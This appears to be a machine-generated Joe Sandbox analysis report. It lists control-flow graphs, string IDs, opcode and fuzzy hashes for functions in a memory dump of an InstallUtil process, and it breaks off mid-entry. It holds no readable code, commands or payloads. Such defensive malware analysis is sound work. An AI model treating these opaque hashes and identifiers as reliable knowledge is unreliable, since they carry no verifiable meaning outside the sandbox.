                                                  control_flow_graph 2194 1055f38-1055f5a 2195 1055f70-1055f7b 2194->2195 2196 1055f5c-1055f60 2194->2196 2199 1055f81-1055f83 2195->2199 2200 1056023-105604f 2195->2200 2197 1055f62-1055f6e 2196->2197 2198 1055f88-1055f8f 2196->2198 2197->2195 2197->2198 2202 1055f91-1055f98 2198->2202 2203 1055faf-1055fb8 2198->2203 2201 105601b-1056020 2199->2201 2206 1056056-10560ae 2200->2206 2202->2203 2204 1055f9a-1055fa5 2202->2204 2279 1055fba call 1055f38 2203->2279 2280 1055fba call 1055f2a 2203->2280 2204->2206 2207 1055fab-1055fad 2204->2207 2226 10560b0-10560b6 2206->2226 2227 10560bd-10560cf 2206->2227 2207->2201 2208 1055fc0-1055fc2 2209 1055fc4-1055fc8 2208->2209 2210 1055fca-1055fd2 2208->2210 2209->2210 2213 1055fe5-1056004 call 10569a0 2209->2213 2214 1055fd4-1055fd9 2210->2214 2215 1055fe1-1055fe3 2210->2215 2220 1056006-105600f 2213->2220 2221 1056019 2213->2221 2214->2215 2215->2201 2273 1056011 call 105aef0 2220->2273 2274 1056011 call 105afad 2220->2274 2275 1056011 call 105aeba 2220->2275 2221->2201 2223 1056017 2223->2201 2226->2227 2229 10560d5-10560d9 2227->2229 2230 1056163-1056165 2227->2230 2231 10560e9-10560f6 2229->2231 2232 10560db-10560e7 2229->2232 2276 1056167 call 1056300 2230->2276 2277 1056167 call 10562f0 2230->2277 2240 10560f8-1056102 2231->2240 2232->2240 2233 105616d-1056173 2234 1056175-105617b 2233->2234 2235 105617f-1056186 2233->2235 2238 10561e1-1056240 2234->2238 2239 105617d 2234->2239 2252 1056247-105625e 2238->2252 2239->2235 2243 1056104-1056113 2240->2243 2244 105612f-1056133 2240->2244 2255 1056115-105611c 2243->2255 2256 1056123-105612d 2243->2256 2245 1056135-105613b 2244->2245 2246 105613f-1056143 2244->2246 2248 105613d 2245->2248 2249 1056189-10561da 2245->2249 2246->2235 2250 1056145-1056149 2246->2250 2248->2235 2249->2238 2250->2252 2253 105614f-1056161 2250->2253 2253->2235 2255->2256 2256->2244 2273->2223 2274->2223 2275->2223 2276->2233 2277->2233 2279->2208 2280->2208
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4494788125.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_1050000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Haq$Haq
                                                  • API String ID: 0-4016896955
                                                  • Opcode ID: 3863e48ff07f207507ef31961f252b7f55284fb57864f82e6cee086ce56b3540
                                                  • Instruction ID: 0ad13699346c41381fe08ac00af1b7144677e1624d7208aaca1f26f59b3c8a7e
                                                  • Opcode Fuzzy Hash: 3863e48ff07f207507ef31961f252b7f55284fb57864f82e6cee086ce56b3540
                                                  • Instruction Fuzzy Hash: 079182303082558FDB559F28C85467F7BE6BF89301F1844A9E9868B396DF3ACD42C791
                                                  Function 01056498 Relevance: 2.7, Strings: 2, Instructions: 232COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 2281 1056498-10564a5 2282 10564a7-10564ab 2281->2282 2283 10564ad-10564af 2281->2283 2282->2283 2284 10564b4-10564bf 2282->2284 2285 10566c0-10566c7 2283->2285 2286 10564c5-10564cc 2284->2286 2287 10566c8 2284->2287 2288 1056661-1056667 2286->2288 2289 10564d2-10564e1 2286->2289 2292 10566cd-10566e0 2287->2292 2290 105666d-1056671 2288->2290 2291 1056669-105666b 2288->2291 2289->2292 2293 10564e7-10564f6 2289->2293 2294 1056673-1056679 2290->2294 2295 10566be 2290->2295 2291->2285 2302 10566e2-1056705 2292->2302 2303 1056718-105671a 2292->2303 2299 10564f8-10564fb 2293->2299 2300 105650b-105650e 2293->2300 2294->2287 2297 105667b-105667e 2294->2297 2295->2285 2297->2287 2301 1056680-1056695 2297->2301 2304 10564fd-1056500 2299->2304 2305 105651a-1056520 2299->2305 2300->2305 2306 1056510-1056513 2300->2306 2320 1056697-105669d 2301->2320 2321 10566b9-10566bc 2301->2321 2322 1056707-105670c 2302->2322 2323 105670e-1056712 2302->2323 2307 105671c-105672e 2303->2307 2308 105672f-1056736 2303->2308 2309 1056506 2304->2309 2310 1056601-1056607 2304->2310 2315 1056522-1056528 2305->2315 2316 1056538-1056555 2305->2316 2311 1056515 2306->2311 2312 1056566-105656c 2306->2312 2317 105662c-1056639 2309->2317 2326 105661f-1056629 2310->2326 2327 1056609-105660f 2310->2327 2311->2317 2318 1056584-1056596 2312->2318 2319 105656e-1056574 2312->2319 2324 105652c-1056536 2315->2324 2325 105652a 2315->2325 2351 105655e-1056561 2316->2351 2344 105664d-105664f 2317->2344 2345 105663b-105663f 2317->2345 2346 10565a6-10565c9 2318->2346 2347 1056598-10565a4 2318->2347 2332 1056576 2319->2332 2333 1056578-1056582 2319->2333 2334 10566af-10566b2 2320->2334 2335 105669f-10566ad 2320->2335 2321->2285 2322->2303 2323->2303 2324->2316 2325->2316 2326->2317 2329 1056611 2327->2329 2330 1056613-105661d 2327->2330 2329->2326 2330->2326 2332->2318 2333->2318 2334->2287 2339 10566b4-10566b7 2334->2339 2335->2287 2335->2334 2339->2320 2339->2321 2350 1056653-1056656 2344->2350 2345->2344 2349 1056641-1056645 2345->2349 2346->2287 2358 10565cf-10565d2 2346->2358 2356 10565f1-10565ff 2347->2356 2349->2287 2352 105664b 2349->2352 2350->2287 2353 1056658-105665b 2350->2353 2351->2317 2352->2350 2353->2288 2353->2289 2356->2317 2358->2287 2360 10565d8-10565ea 2358->2360 2360->2356
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4494788125.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_1050000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ,aq$,aq
                                                  • API String ID: 0-2990736959
                                                  • Opcode ID: 58f9d2a3c76457160411d0357d6e83a6aa526701d829e5afa55a9dd1355ab491
                                                  • Instruction ID: 448ced5411a68b8766c2664de8c40345fdadd2f44365d559e754c84f0e527256
                                                  • Opcode Fuzzy Hash: 58f9d2a3c76457160411d0357d6e83a6aa526701d829e5afa55a9dd1355ab491
                                                  • Instruction Fuzzy Hash: B1819C34A005068FDB98CF6DC49496FBBF2BF89204B9481A9D985D7365DB32EC41CBA1
                                                  Function 01053CC0 Relevance: 2.6, Strings: 2, Instructions: 112COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4494788125.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_1050000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Xaq$Xaq
                                                  • API String ID: 0-1488805882
                                                  • Opcode ID: a3362180515210d0a9657a7fbaf6c6639e668f436bbc797b97f139d86b930632
                                                  • Instruction ID: 08246ea2f2220c0ae156dea0db87147abf466123f1af4b8750e8529fb0be41b3
                                                  • Opcode Fuzzy Hash: a3362180515210d0a9657a7fbaf6c6639e668f436bbc797b97f139d86b930632
                                                  • Instruction Fuzzy Hash: B93126317002298BDB996A6EA99427FA9FABBC0380F144439DC86CB394DB75CC058361
                                                  Function 01059D59 Relevance: 2.5, Strings: 2, Instructions: 44COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4494788125.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_1050000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4']q$4']q
                                                  • API String ID: 0-3120983240
                                                  • Opcode ID: 8c74f7b701eff6a5e0285d87ccedb4f851d46ab4a3cf71c372000a9b5a029140
                                                  • Instruction ID: 047208d2a1db02b27cbdc724b188a815618ac93c48283e30b614dbbdcc879fde
                                                  • Opcode Fuzzy Hash: 8c74f7b701eff6a5e0285d87ccedb4f851d46ab4a3cf71c372000a9b5a029140
                                                  • Instruction Fuzzy Hash: 17F086353001056FDB582AA9985096B6ACBEBDC250B048425BA8AC7350DE65CC01C3A0
                                                  Function 01050C8F Relevance: 1.8, Strings: 1, Instructions: 546COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4494788125.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_1050000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: LR]q
                                                  • API String ID: 0-3081347316
                                                  • Opcode ID: 5f56f8f3eab812b6f0aef0885f34ce62fe25b63c15be87e4c049533409e30e9e
                                                  • Instruction ID: 1b58bcc5bb32e6633546d22311158d23ed51e93e61a1baa8ff2a56da11b96696
                                                  • Opcode Fuzzy Hash: 5f56f8f3eab812b6f0aef0885f34ce62fe25b63c15be87e4c049533409e30e9e
                                                  • Instruction Fuzzy Hash: 3152B878900219CFCB54EF68E994BADBBB2FF88305F1085A5D449A7368DB345E86CF50
                                                  Function 01050CA0 Relevance: 1.8, Strings: 1, Instructions: 539COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4494788125.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_1050000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: LR]q
                                                  • API String ID: 0-3081347316
                                                  • Opcode ID: ea3dcf704e32f2f778cd718c23647a7d4d48142fc78446203770b591298b1729
                                                  • Instruction ID: e9ee05c1574e24f0373a80a2f138707766930960aab82bb2e744f66962e4823e
                                                  • Opcode Fuzzy Hash: ea3dcf704e32f2f778cd718c23647a7d4d48142fc78446203770b591298b1729
                                                  • Instruction Fuzzy Hash: AD52B878900219CFCB54EF68E994BADBBB2FF88301F1085A5D549A7368DB345E86CF50
                                                  Function 0105E007 Relevance: .7, Instructions: 654COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4494788125.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_1050000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: afb8afa35f3e1e6ab7f07a775d9760c5c3880934542918ec6ce3d08359d92c8e
                                                  • Instruction ID: e7f58aba609efd77b7e8de1f85dbdb5b9e1ad4d38e2db30e6866e6d9ec3ecc5a
                                                  • Opcode Fuzzy Hash: afb8afa35f3e1e6ab7f07a775d9760c5c3880934542918ec6ce3d08359d92c8e
                                                  • Instruction Fuzzy Hash: 581295340297539FE6603B34E6AC12EBA60FB5F767314AC10B1CFC0559EB7A1499CB26
                                                  Function 0105E018 Relevance: .6, Instructions: 647COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4494788125.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_1050000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 54195e0400270c77fe559e2a0ee7b1dd3333f4acaeb194021e60c2df33739641
                                                  • Instruction ID: d16322dfec2946b0bf5bfb60e7bca2807e1994162c9c63dda5763b99ba466e07
                                                  • Opcode Fuzzy Hash: 54195e0400270c77fe559e2a0ee7b1dd3333f4acaeb194021e60c2df33739641
                                                  • Instruction Fuzzy Hash: 511295340297539FA6603B34E6AC12EBA60FB5F767314AC10B1CFC0559EF7A1499CB26
                                                  Function 01057CD0 Relevance: .2, Instructions: 201COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4494788125.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_1050000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 838767f31f71ec4308c4c57d935ea902a2636ac927a3d6e890ca498021d1d552
                                                  • Instruction ID: 484e67e766e447adc03062e324eeaf7ffd1426badb599e4ab223c7209e46974b
                                                  • Opcode Fuzzy Hash: 838767f31f71ec4308c4c57d935ea902a2636ac927a3d6e890ca498021d1d552
                                                  • Instruction Fuzzy Hash: 2B712A317002058FDBA5DF2CC884A6E7BF5AF89704B5900A9E986CB371DB75DC41EBA1
                                                  Function 0105F3D0 Relevance: .2, Instructions: 164COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4494788125.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_1050000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 63f4f3b798aadcf84a97128aa899c449b0aa3d534f46e47aed3e746a8a949669
                                                  • Instruction ID: 597da658518f5efdcf999390769fbf87f10b3fe3a0893a350c97f58fa3b0d76b
                                                  • Opcode Fuzzy Hash: 63f4f3b798aadcf84a97128aa899c449b0aa3d534f46e47aed3e746a8a949669
                                                  • Instruction Fuzzy Hash: F7616374D01319CFDB15DFB4D854AAEBBB2FF89304F208069D844AB2A5DB39594ACF41
                                                  Function 0105D548 Relevance: .1, Instructions: 140COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4494788125.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_1050000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ca4c593c3fc51ad8542b664fcf100a820ceb9d8420bcd6d86b647a124ee32580
                                                  • Instruction ID: aea7578c91700522477bb0b8748814bdb36b6cebbf9d5fb7cbe6f5bc536907c0
                                                  • Opcode Fuzzy Hash: ca4c593c3fc51ad8542b664fcf100a820ceb9d8420bcd6d86b647a124ee32580
                                                  • Instruction Fuzzy Hash: AA518374E01208DFDB44DFAAD59499DBBF2FF89310F20816AE919AB365DB31A901CF50
                                                  Function 010541A0 Relevance: .1, Instructions: 134COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4494788125.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_1050000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3f809432b12d122bdc8d4607253752fb85105aa640d5fdcb182127bfe6ee0b78
                                                  • Instruction ID: d946f606d3c71d490bcee014e4f870bfdd2629ee0b01d3f01cd885015133265c
                                                  • Opcode Fuzzy Hash: 3f809432b12d122bdc8d4607253752fb85105aa640d5fdcb182127bfe6ee0b78
                                                  • Instruction Fuzzy Hash: 9B518574E01208CFCB48DFA9D59499DBBF2FF89314B209469E809AB365DB35A942CF50
                                                  Function 0105A303 Relevance: .1, Instructions: 124COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4494788125.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_1050000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 265339f23008f508b6727b012f73beab766decd293c9a6136d41569d273d58cb
                                                  • Instruction ID: 79c9abc1b1b715033be82501e7e26181090802cc50c2002b3099452b2cd3524f
                                                  • Opcode Fuzzy Hash: 265339f23008f508b6727b012f73beab766decd293c9a6136d41569d273d58cb
                                                  • Instruction Fuzzy Hash: 1D41BF31B04249DFCF52CFA8C844A9EBFF2AF89314F048295E9859B292D775E814CB60
                                                  Function 01059C30 Relevance: .1, Instructions: 107COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4494788125.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_1050000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f21d6975bd4a69a5ccc0d676a582a70f914cb5df33868cf98eb7f79d19995939
                                                  • Instruction ID: 573c9cb21d5d07d89da1ff7299849e6ce006c2e3fead34a1be94e5b9f1a745ab
                                                  • Opcode Fuzzy Hash: f21d6975bd4a69a5ccc0d676a582a70f914cb5df33868cf98eb7f79d19995939
                                                  • Instruction Fuzzy Hash: 8B418F30604245CFDB81DB6CC844BAFBBF6AF49319F5488A6E988CB256D735DC01CB62
                                                  Function 01055658 Relevance: .1, Instructions: 101COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4494788125.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_1050000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3442662f18e2b55067c628e6ff5d6d8981a091d4c6ff44d7637d78a88732154c
                                                  • Instruction ID: 7a8eeff5db3bc57b0e7270fcbfb48ddc36b00a8dbaf62db1fd5b4b2f642df3d7
                                                  • Opcode Fuzzy Hash: 3442662f18e2b55067c628e6ff5d6d8981a091d4c6ff44d7637d78a88732154c
                                                  • Instruction Fuzzy Hash: F0318F31304149DFCB55AF64E854AAF7BA2FB88300F008055FED587359CB39DA22DBA1
                                                  Function 01052790 Relevance: .1, Instructions: 88COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4494788125.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_1050000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c287f6a261f7f31b561120e313864bb24aa44876cb1dbd25fe77c08e3329cca6
                                                  • Instruction ID: 918039a9f8ea67894ce72f61c1b16fa31233bac41d1cad5f2b9ac6309592b5c9
                                                  • Opcode Fuzzy Hash: c287f6a261f7f31b561120e313864bb24aa44876cb1dbd25fe77c08e3329cca6
                                                  • Instruction Fuzzy Hash: A0312630909249CFCB45EFA8D9045EEBFF4FF4A304F0041AAD985E7265EB355A85CBA1
                                                  Function 01057F78 Relevance: .1, Instructions: 87COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4494788125.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_1050000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1d6808476468bebb6b265b17b5476bc6caa6d3e287b6893ed0e275f9497242d0
                                                  • Instruction ID: 8f653887bfe76ca56b218fd90bfb94f874f908c7a7f78aeb6330a01d234cd46b
                                                  • Opcode Fuzzy Hash: 1d6808476468bebb6b265b17b5476bc6caa6d3e287b6893ed0e275f9497242d0
                                                  • Instruction Fuzzy Hash: 8021A1303041004BDBE5662FC45467F75D7AFC4658F14C07AED86CB39AEE6ACC829351
                                                  Function 010528F0 Relevance: .1, Instructions: 77COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4494788125.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_1050000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b76d422869368a2b9e7d61be477ee4367e9e3dfcbcde2518fda7449ab7aa1746
                                                  • Instruction ID: 6e82d8e7bae32019b906012b802cbb023bf77612895281fcddbc3340e8b686fb
                                                  • Opcode Fuzzy Hash: b76d422869368a2b9e7d61be477ee4367e9e3dfcbcde2518fda7449ab7aa1746
                                                  • Instruction Fuzzy Hash: E721AC35E00105EFCB95DF68C840AAF77B5EF992A4B148459D84A9B340DB30EA47CBD2
                                                  Function 01056300 Relevance: .1, Instructions: 74COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4494788125.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_1050000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6b159a92f6013d8501ee3d7725caa0eda9620968e882b71c582815e20231a8f1
                                                  • Instruction ID: 79c0ad16b8c5403810fa947da16a08b5fe0fef87ecf5b534aebc64d5b675c8bb
                                                  • Opcode Fuzzy Hash: 6b159a92f6013d8501ee3d7725caa0eda9620968e882b71c582815e20231a8f1
                                                  • Instruction Fuzzy Hash: 5D21F0313046118FD7699B2AC45492FBBA2FFC97557448069ED8ADB399CF32DC02CB80
                                                  Function 01055649 Relevance: .1, Instructions: 69COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4494788125.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_1050000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5b0e992b70051a53dda51d51a3622c9d70dd59a2be8c230de57b5fbd83e226aa
                                                  • Instruction ID: ad7b460b5f1fe96823da1c98bdc1d20e03a61e711528a17778f98c77718b5d68
                                                  • Opcode Fuzzy Hash: 5b0e992b70051a53dda51d51a3622c9d70dd59a2be8c230de57b5fbd83e226aa
                                                  • Instruction Fuzzy Hash: E1210431609289CFDB55AF68E8146AF3BE1FB49310F0040AAF9C58B359CB399D51CBA1
                                                  Function 01054285 Relevance: .1, Instructions: 68COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4494788125.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_1050000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: db98eff9c039c820d52972ff5d1e79974bbaa5d6ffdc5589d997a3891b1759a3
                                                  • Instruction ID: 5ed5eb9d2f2308bc07fe97396836fba21868270aebd83f075fd18adbf694affc
                                                  • Opcode Fuzzy Hash: db98eff9c039c820d52972ff5d1e79974bbaa5d6ffdc5589d997a3891b1759a3
                                                  • Instruction Fuzzy Hash: 4531A478E11209CFCB44DFA8E5949ADBBF2FF49304B208469E809AB365D735AD42CF40
                                                  Function 01059761 Relevance: .1, Instructions: 65COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4494788125.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_1050000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c8c217686facd24e5ef1c8373c3a029bfbb36044464b0755a5dffc6f3f325ea6
                                                  • Instruction ID: b037746d714efffc31af5f3e93526249fb94af06f59d17a1aba7c5d851ce2f77
                                                  • Opcode Fuzzy Hash: c8c217686facd24e5ef1c8373c3a029bfbb36044464b0755a5dffc6f3f325ea6
                                                  • Instruction Fuzzy Hash: 81217C30E04248DFDB55CFA5D550AEEBFB6EF48304F1480AAE891E6294DB35D941DB20
                                                  Function 0105EF12 Relevance: .1, Instructions: 63COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4494788125.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_1050000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d5d36f5e258e3a6f23a7368bc34f75d27b54e9745917174bc2384e4b6520da4b
                                                  • Instruction ID: 010cfe64c9f92e2cc3f5107095955e3fadbb6b3d1495a1f11f1d01147f9a6575
                                                  • Opcode Fuzzy Hash: d5d36f5e258e3a6f23a7368bc34f75d27b54e9745917174bc2384e4b6520da4b
                                                  • Instruction Fuzzy Hash: A0217174D00249CFCB45EFB8D55069EBFF1FF41300F1086A9C1949B266DB359A46CB81
                                                  Function 010562F0 Relevance: .1, Instructions: 62COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4494788125.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_1050000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7809773918bd73ea4a02472fec5138f86e44c27741dcaf04604e22b5b87eb65e
                                                  • Instruction ID: 4460e295a1bf4fc58c69654f263ca1b6620b09fefe3a9532b944f472ca5423b2
                                                  • Opcode Fuzzy Hash: 7809773918bd73ea4a02472fec5138f86e44c27741dcaf04604e22b5b87eb65e
                                                  • Instruction Fuzzy Hash: 9511E3313096118FD7655B29D46852FBBE2FFC675135880A9E986CB365CF26DC02C790
                                                  Function 010527F0 Relevance: .1, Instructions: 57COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4494788125.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_1050000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 26fa6c9347e7c253ae78c55af4426bcb85b1bc46fb477fea4898f76a93fb6554
                                                  • Instruction ID: a3faa7ea71bd3cfd10bb1f1d4d26e6ce4cc12dd636f48f47143af65bce6c7b52
                                                  • Opcode Fuzzy Hash: 26fa6c9347e7c253ae78c55af4426bcb85b1bc46fb477fea4898f76a93fb6554
                                                  • Instruction Fuzzy Hash: 7A21DB74D0520ACFCB41EFA9D9445EEBFF4EF4A304F1041AAD885B2224EB355A85CBA1
                                                  Function 0105EF20 Relevance: .1, Instructions: 54COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4494788125.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_1050000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a6d5d9bd164069427b6c61c7f3d9da57ab32a29e7a023a12cb967803ade03ece
                                                  • Instruction ID: d8e33fc69a5e3b8ddcbba5939e3a565f76c6784c6b42e665b3ffa94451c40f9b
                                                  • Opcode Fuzzy Hash: a6d5d9bd164069427b6c61c7f3d9da57ab32a29e7a023a12cb967803ade03ece
                                                  • Instruction Fuzzy Hash: 60112974D002099FDB45EFA8D950A9EBBF5FF44300F10C5A9D1589B265EB349A4ACB81
                                                  Function 0105E8E8 Relevance: .0, Instructions: 44COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4494788125.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_1050000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 28cc3bde2085ef60f4ce9a94f7a3c0c65b4034073c39ae07004153d7289cfc73
                                                  • Instruction ID: d4081ab9517c5498d5ee21251ca53a99aa09593f7858b4760a3af2cf2342ac41
                                                  • Opcode Fuzzy Hash: 28cc3bde2085ef60f4ce9a94f7a3c0c65b4034073c39ae07004153d7289cfc73
